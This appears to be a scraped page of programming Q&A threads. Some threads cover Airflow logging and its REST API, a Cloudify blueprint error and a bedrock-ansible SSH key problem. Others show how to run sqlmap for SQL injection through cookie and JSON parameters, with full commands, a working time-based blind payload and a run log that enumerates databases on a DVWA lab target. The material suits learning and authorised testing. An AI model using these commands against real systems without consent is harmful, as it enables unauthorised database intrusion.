[21:07:29] [INFO] (custom) POST parameter 'JSON phone' appears to be 'MySQL AND time-based blind (ELT)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
tips have time-based blind injectable,but I user "time-based blind" pattern can not find injectable.
I use command: "sqlmap -r /Users/yangzhuo/Downloads/sql1.txt --level=5 --risk=3 -vvv -random-agent --technique T -batch -dbs"
Related
I am using Airflow 1.10.5. Can't seem to find complete documentation or sample on how to setup remote logging using Elasticsearch. I saw airflow documentation about logging, but it wasn't helpful. I am trying to write the airflow (not task) logs to ES.
As far as I understand the docs, the ES log handler can only read from ES. You would have to setup your logging to print into a file, then use something like filebeat to post the file content to ES and Airflow can then read them back...
https://airflow.readthedocs.io/en/stable/howto/write-logs.html#writing-logs-to-elasticsearch
Writing Logs to Elasticsearch
Airflow can be configured to read task
logs from Elasticsearch and optionally write logs to stdout in
standard or json format. These logs can later be collected and
forwarded to the Elasticsearch cluster using tools like fluentd,
logstash or others.
I was able to achieve using [filebeat][1] shipper.
Input config section in filebeat.yml
</snip>
# ============================== Filebeat inputs ===============================
filebeat.inputs:
# Each - is an input. Most options can be set at the input level, so
# you can use different inputs for various configurations.
# Below are the input specific configurations.
- type: log
# Change to true to enable this input configuration.
enabled: true
# Paths that should be crawled and fetched. Glob based paths.
paths:
- /path/to/logs/*.log
</snip>
Output config section in filebeat.yml
<snip>
# ---------------------------- Elasticsearch Output ----------------------------
output.elasticsearch:
# Array of hosts to connect to.
hosts: ["localhost:9200"]
# Protocol - either `http` (default) or `https`.
#protocol: "https"
# Authentication credentials - either API key or username/password.
#api_key: "id:api_key"
username: "elastic"
password: "changeme"
</snip>
Good doc to read especially about airflow --> ES.
The airflow documentation states:
Airflow exposes an experimental Rest API. It is available through the webserver. Endpoints are available at /api/experimental/. Please note that we expect the endpoint definitions to change.
https://airflow.apache.org/api.html#experimental-rest-api
However it doesn't state in which version the API appears. We are running Airflow v1.8.0
But whenever I browse to /api/ or /api/experimental/ I get a 404 and the spinning circles.
I tried curling the same URLs but that only confirmed the same, /api/ gives me a 404:
$ curl -I -L -s http://${AIRFLOWIP}:8080/admin/ | grep HTTP
HTTP/1.1 200 OK
$ curl -I -L -s http://${AIRFLOWIP}:8080/api/ | grep HTTP
HTTP/1.1 404 NOT FOUND
We have this setting in airflow.cfg:
[api]
# How to authenticate users of the API
auth_backend = airflow.api.auth.backend.default
I don't know whether the API is only available in a later version of Airflow or if we have stood it up incorrectly.
Can someone let me know in which version of airflow we can find the experimental API?
The first experimental endpoints were added in 1.8.0, with a few more endpoints added in following releases. There is no endpoint for the root paths of /api/ and /api/experimental/ on any version, so those curls are not expected to work. However, there is a /api/experimental/test/ endpoint which you can hit to confirm the API is available.
If you're going to be using the experimental API, I think the code is the best reference at the moment.
The Airflow API is no more at the experimental phase.
Stable version here Airflow REST API.
we have an openstack deployment. We chose to deploy cloudify manager by image option. Now we are using the paid version of the manager image. When we tried to upload a openstack blueprint from the CLI:
cfy blueprints upload -b vm -p cloudify-nodecellar-example-master/openstack-blueprint.yaml
we have the next output error on the cloudify manager:
20/12/2017 11:45:21 [INFO] [manager_rest.server] InvalidBlueprintError: Invalid blueprint - Failed to resolve the following urls: {u'file:///opt/manager/resources/spec/cloudify/4.3.dev1/types.yaml': "Import failed: Unable to open import url file:///opt/manager/resources/spec/cloudify/4.3.dev1/types.yaml; "}. In addition, failed to resolve the original import url - Import failed: Unable to open import url http://www.getcloudify.org/spec/cloudify/4.3.dev1/types.yaml; HTTPConnectionPool(host='www.getcloudify.org', port=80): Max retries exceeded with url: /spec/cloudify/4.3.dev1/types.yaml (Caused by NewConnectionError(': Failed to establish a new connection: [Errno -3] Temporary failure in name resolution',))
in: /opt/manager/resources/openstack-blueprint-b03206ec-1bde-4595-8cc0-93de5510f777/openstack-blueprint.yaml
in line: 7, column: 0
path: imports
value: ['http://www.getcloudify.org/spec/cloudify/4.3.dev1/types.yaml', 'http://www.getcloudify.org/spec/openstack-plugin/2.0.1/plugin.yaml', 'http://www.getcloudify.org/spec/diamond-plugin/1.3.6/plugin.yaml', 'types/nodecellar.yaml', 'types/openstack-types.yaml']
20/12/2017 11:45:23 [INFO] [manager_rest.server] Authenticated user:
It seems like there are a few issues, which I will not go through here. The best way to get started is to follow the step-by-step instructions at this link.
If you have any further questions, please feel free to ask them here or in our user group.
I try to install https://github.com/roots/bedrock-ansible to get a bedrock deployment (http://roots.io/wordpress-stack/) running.
When I run "vagrant up", after some time I get the error:
TASK: [capistrano-setup | Setup deploy group] *********************************
skipping: [default]
TASK: [capistrano-setup | Setup deploy user] **********************************
skipping: [default]
TASK: [capistrano-setup | Adding public key to server] ************************
fatal: [default] => could not locate file in lookup: ~/.ssh/id_rsa.pub
FATAL: all hosts have already failed -- aborting
PLAY RECAP ********************************************************************
to retry, use: --limit #/Users/johannes/site.retry
default : ok=46 changed=16 unreachable=1 failed=0
Ansible failed to complete successfully. Any error output should be
visible above. Please fix these errors and try again.
I do not have a clou how i can fix this. Do you have an idea?
It seems the role is trying to find your local public key. It should be in the location in the error message '~/.ssh/id_rsa.pub', but it's not. So either you don't have one, or you keep it in another location.
If you're not familiar with generating SSH keys you probably don't have one. I personally like the GitHub help page for this: https://help.github.com/articles/generating-ssh-keys/
(you only have to perform steps 1 and 2).
If you do have SSH keys, but in a different location, the capistrano-install role in bedrock uses some variables:
deploy_user: deploy
deploy_keys:
- "~/.ssh/id_rsa.pub"
So you can set (multiple) public key files in the deploy_keys list and they will be added to the deploy_user's authorized keys.
All this is needed because Capistrano will use the deploy user to connect to the remote server later. http://blakesmith.me/2010/02/08/understanding-public-key-private-key-concepts.html
I need to do SQL injection on a part of cookie using sqlmap. The target URL is static.
A sample cookie:
Cookie1=blah_var1/blah_val1/blah_var2/blah_val2/searchtext/userinput/blah_var3/blah_val3/.../
In this cookie i need to inject the "userinput" using sqlmap. I know --cookie parameter but it wont work in this case. This is like part of cookie alone have to be injected using sqlmap.
I don't know how to do this. Please help.
i got the same problem to inject SQL in Cookie, I looked at its help and its code, now finally something made some sense, let me put my hypothesis:
Cookie base inject works with only level>=2.
You need to specify param-filter='COOKIE'.
Do not let sqlmap to try for URI injections when it asked for, or else it will fail by doing GET/POST based testing.
If you specify custom injection marker on that testable cookie do not proceed with that, or else it will fail.
I didn't try so many combinations on 3rd and 4th points, feel free to invalidate them. Okay so, try something like this:
sqlmap -u 'protocol://test.server/test_url/' --cookie='id=*; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high' -p 'id' --param-filter='COOKIE' --skip='PHPSESSID,security' --flush-session --fresh-queries --proxy='https://localhost:7777' --dbs --dbms='mysql' --os='linux' --ignore-code=404 --output-dir=./sqlmapdir/ --level=2
options necessary for cookie based testing are: -u, --cookie, -p, --param-filter, --level.
Command tried on SQLMap version: 1.4.8#stable
output:
$ sqlmap -u 'http://dvwa.local/vulnerabilities/sqli_blind/' --cookie='id=*; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high' -p 'id' --param-filter='COOKIE' --skip='PHPSESSID,security' --flush-session --fresh-queries --proxy='https://localhost:7777' --dbs --dbms='mysql' --os='linux' --ignore-code=404 --output-dir=./sqlmapdir/ --level=2
___
__H__
___ ___[']_____ ___ ___ {1.4.8#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting # 01:18:36 /2020-08-31/
[01:18:36] [WARNING] using '/home/dinesh/Documents/work/workspaces/git_temp_projs/dvwa/SQL_Injection_Blind/sqlmapdir' as the output directory
[01:18:36] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site_com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] n
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
[01:18:39] [INFO] testing connection to the target URL
[01:18:40] [INFO] testing if the target URL content is stable
[01:18:43] [INFO] target URL content is stable
do you want to URL encode cookie values (implementation specific)? [Y/n] y
[01:19:01] [WARNING] heuristic (basic) test shows that Cookie parameter 'id' might not be injectable
[01:19:02] [INFO] testing for SQL injection on Cookie parameter 'id'
[01:19:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:19:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[01:19:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[01:19:15] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[01:19:17] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[01:19:17] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[01:19:17] [INFO] testing 'Generic inline queries'
[01:19:17] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[01:19:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[01:19:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:19:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:19:31] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:19:32] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[01:19:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:19:47] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[01:19:50] [INFO] testing 'MySQL inline queries'
[01:19:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[01:19:52] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[01:19:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:20:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[01:20:33] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[01:21:28] [INFO] Cookie parameter 'id' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n] n
[01:23:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:23:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:23:47] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[01:24:08] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1')
[01:24:08] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[01:24:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[01:24:27] [INFO] testing 'MySQL UNION query (65) - 21 to 40 columns'
[01:24:36] [INFO] checking if the injection point on Cookie parameter 'id' is a false positive
Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 262 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: id=*' RLIKE SLEEP(5) AND 'EZrr'='EZrr; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high
---
[01:50:27] [INFO] the back-end DBMS is MySQL
[01:50:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:50:52] [INFO] fetching database names
[01:50:52] [INFO] fetching number of databases
[01:50:52] [INFO] retrieved: 2
[01:51:42] [INFO] retrieved: information_schema
[02:16:58] [INFO] retrieved: dvwa
available databases [2]:
[*] dvwa
[*] information_schema
[02:22:32] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 414 times
[02:22:32] [INFO] fetched data logged to text files under '/home/dinesh/Documents/work/workspaces/git_temp_projs/dvwa/SQL_Injection_Blind/sqlmapdir/dvwa.local'
[*] ending # 02:22:32 /2020-08-31/
Intercept all request, save it to a file and then give that file to sqlmap with -r parameter, by default sqlmap should check cookie.
sqlmap.py -r request.txt
You can use tamper data (firefox extension), or free version of burp proxy to intercept request.
Try something like this:
sqlmap.py -u localhost/vulnerable --cookie="STATE_COOKIE=%2F1%2F_VMD%2F1%26_REQS%2F_RVID%2FCriteriaResourceFilter%2F_TIME%2F1403689244638%2F_ORVID%2FPassTrixMain%2FSEARCH_COLUMN%2FRESOURCENAME%2FSEARCH_VALUE%2Fsearchtext*"
This will test the parameter auth in the cookie:
sqlmap -u "website" --cookie='auth=blabla; uuid=blabla' -p auth --level=2
Level must be at least 2. This isn't the only way to specify the parameter to test, you can also use * to specify the injection point.
sqlmap -u "website" --cookie='auth=blabla; uuid=*' --level=2